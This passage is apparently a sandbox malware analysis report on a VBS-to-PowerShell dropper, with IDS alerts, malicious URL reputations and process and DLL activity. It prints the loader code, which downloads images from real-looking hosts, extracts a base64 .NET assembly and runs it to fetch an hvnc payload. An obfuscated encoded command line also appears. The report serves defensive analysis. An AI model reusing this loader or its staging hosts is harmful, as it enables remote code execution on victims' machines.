Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673', 'http://45.74.19.84/xampp/bkp/bkp1_vbs.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.cnvh/KJ/moc.srednowsredniw//:sptth' , '1' , 'C:\ProgramData\' , 'Name'))} }, CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalF
Timestamp:172.67.215.45192.168.2.6443497012018856 02/13/24-21:13:54.637091
SID:2018856
Source Port:443
Destination Port:49701
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:172.67.215.45192.168.2.6443497012049038 02/13/24-21:13:55.113335
SID:2049038
Source Port:443
Destination Port:49701
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:172.67.215.45192.168.2.6443497012047750 02/13/24-21:13:54.637091
SID:2047750
Source Port:443
Destination Port:49701
Protocol:TCP
Classtype:A Network Trojan was detected

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
Source: https://winderswonders.com/JK/hvnc.txtAvira URL Cloud: Label: malware
Source: https://winderswonders.comAvira URL Cloud: Label: malware
Source: https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673Avira URL Cloud: Label: malware
Source: http://45.74.19.84/xampp/bkp/bkp1_vbs.jpgAvira URL Cloud: Label: malware
Source: unknownHTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.6:49700 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.215.45:443 -> 192.168.2.6:49701 version: TLS 1.2

Software Vulnerabilities

barindex
Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

barindex
Source: TrafficSnort IDS: 2047750 ET TROJAN Base64 Encoded MZ In Image 172.67.215.45:443 -> 192.168.2.6:49701
Source: TrafficSnort IDS: 2018856 ET TROJAN Windows executable base64 encoded 172.67.215.45:443 -> 192.168.2.6:49701
Source: TrafficSnort IDS: 2049038 ET TROJAN Malicious Base64 Encoded Payload In Image 172.67.215.45:443 -> 192.168.2.6:49701
Source: unknownDNS query: name: paste.ee
Source: Name.vbs.5.drBinary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport><force/></analyze_input> - obfuscation quality: 4
Source: Name.vbs.5.drBinary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport></analyze_input> - obfuscation quality: 4
Source: global trafficHTTP traffic detected: GET /images/004/731/958/original/new_image.jpg?1707143673 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 104.21.84.67 104.21.84.67
Source: Joe Sandbox ViewIP Address: 172.67.215.45 172.67.215.45
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: global trafficHTTP traffic detected: GET /d/JZHbW HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: paste.ee
Source: global trafficHTTP traffic detected: GET /d/JZHbW HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: paste.ee
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /d/JZHbW HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: paste.ee
Source: global trafficHTTP traffic detected: GET /images/004/731/958/original/new_image.jpg?1707143673 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /d/JZHbW HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: paste.ee
Source: unknownDNS traffic detected: queries for: paste.ee
Source: powershell.exe, 00000004.00000002.2320092493.000001EA52349000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.74.19.84/xampp/bkp/bkp1_vbs.jpg
Source: powershell.exe, 00000005.00000002.2180217020.000002064B21C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2166220762.000002063CB4E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2180217020.000002064B353000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: wscript.exe, 00000000.00000002.2080144251.000001680CC2C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2079537922.000001680CC6E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2080190126.000001680CC6F000.00000004.00000020.00020000.00000000.sdmp, dereac.vbeString found in binary or memory: http://paste.ee/d/JZHbW
Source: powershell.exe, 00000005.00000002.2166220762.000002063B3CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: wscript.exe, 00000008.00000003.2287778815.000001D622B2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.mi
Source: powershell.exe, 00000002.00000002.2672856306.000002B34B5EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2325661291.000001EA54291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2166220762.000002063B1A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.2166220762.000002063C62B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000005.00000002.2166220762.000002063B3CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2672856306.000002B34B56F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000002.00000002.2672856306.000002B34B5C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2325661291.000001EA54291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2166220762.000002063B1A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: wscript.exe, 00000000.00000002.2080334654.000001680CD26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
Source: wscript.exe, 00000000.00000002.2080334654.000001680CD26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
Source: wscript.exe, 00000000.00000002.2080334654.000001680CD26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
Source: wscript.exe, 00000000.00000002.2080334654.000001680CD26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
Source: powershell.exe, 00000005.00000002.2180217020.000002064B353000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.2180217020.000002064B353000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.2180217020.000002064B353000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: wscript.exe, 00000000.00000002.2080334654.000001680CD26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
Source: wscript.exe, 00000000.00000002.2080334654.000001680CD26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
Source: powershell.exe, 00000005.00000002.2166220762.000002063B3CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2707547034.000002B3635AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
Source: powershell.exe, 00000005.00000002.2180217020.000002064B21C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2166220762.000002063CB4E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2180217020.000002064B353000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000005.00000002.2166220762.000002063C62B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
Source: powershell.exe, 00000005.00000002.2166220762.000002063C62B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
Source: wscript.exe, 00000000.00000003.2079419767.000001680CCA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2080235046.000001680CCA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2079009182.000001680CCA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/
Source: wscript.exe, 00000000.00000003.2079419767.000001680CCA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2080235046.000001680CCA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2079009182.000001680CCA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/JZHbW
Source: wscript.exe, 00000000.00000003.2078892658.000001680CCCD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2080287262.000001680CCD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2079339248.000001680CCCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/JZHbWPh
Source: wscript.exe, 00000000.00000003.2079419767.000001680CCA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2080235046.000001680CCA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2079009182.000001680CCA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/JZHbWntsvcs
Source: wscript.exe, 00000000.00000002.2080298338.000001680CCDB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2079117086.000001680CCDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee:443/d/JZHbWu
Source: wscript.exe, 00000000.00000002.2080334654.000001680CD26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
Source: wscript.exe, 00000000.00000002.2080334654.000001680CD26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
Source: powershell.exe, 00000004.00000002.2325661291.000001EA544B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br
Source: powershell.exe, 00000004.00000002.2320092493.000001EA52349000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673
Source: powershell.exe, 00000004.00000002.2195668795.000001EA033B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://winderswonders.com
Source: powershell.exe, 00000004.00000002.2195668795.000001EA033B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://winderswonders.com/JK/hvnc.txt
Source: wscript.exe, 00000000.00000002.2080334654.000001680CD26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
Source: wscript.exe, 00000000.00000002.2080334654.000001680CD26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
Source: wscript.exe, 00000000.00000002.2080334654.000001680CD26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
Source: unknownHTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.6:49700 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.215.45:443 -> 192.168.2.6:49701 version: TLS 1.2

System Summary

barindex
Source: Process Memory Space: powershell.exe PID: 4600, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 3564, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 8196
Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 8196Jump to behavior
Source: C:\Windows\System32\wscript.exeCOM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2087c2f4-2cef-4953-a8ab-66779b670495}Jump to behavior
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDEDgTreLwDgTre5DgTreDUDgTreODgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDEDgTreNDgTreDgTrezDgTreDYDgTreNwDgTrezDgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreGIDgTreawBwDgTreDEDgTreXwB2DgTreGIDgTrecwDgTreuDgTreGoDgTrecDgTreBnDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreEQDgTrebwB3Dg
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDEDgTreLwDgTre5DgTreDUDgTreODgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDEDgTreNDgTreDgTrezDgTreDYDgTreNwDgTrezDgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreGIDgTreawBwDgTreDEDgTreXwB2DgTreGIDgTrecwDgTreuDgTreGoDgTrecDgTreBnDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreEQDgTrebwB3DgJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: winhttpcom.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
